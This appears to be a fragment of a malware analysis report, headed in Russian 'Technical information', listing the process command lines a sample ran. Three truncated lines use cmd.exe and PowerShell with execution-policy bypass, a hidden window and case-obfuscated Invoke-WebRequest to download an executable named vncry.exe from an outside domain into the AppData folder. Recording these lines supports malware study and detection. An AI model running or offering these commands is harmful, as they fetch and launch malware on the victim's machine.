Техническая информация
- '<SYSTEM32>\cmd.exe' /C POWERsHell -eX bYpaSs -nop -W HiDden InVOkE-WebreqUEsT -URI 'https://anenat.net/vncry.exe' -outfILE '%appDAta%\adn...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -eX bYpaSs -nop -W HiDden InVOkE-WebreqUEsT -URI 'https://anenat.net/vncry.exe' -outfILE '%APPDATA%\adnnini.exe' ; invOKE...
- '<SYSTEM32>\cmd.exe' /C POWERsHell -eX bYpaSs -nop -W HiDden InVOkE-WebreqUEsT -URI 'https://anenat.net/vncry.exe' -outfILE '%appDAta%\adn... (со скрытым окном)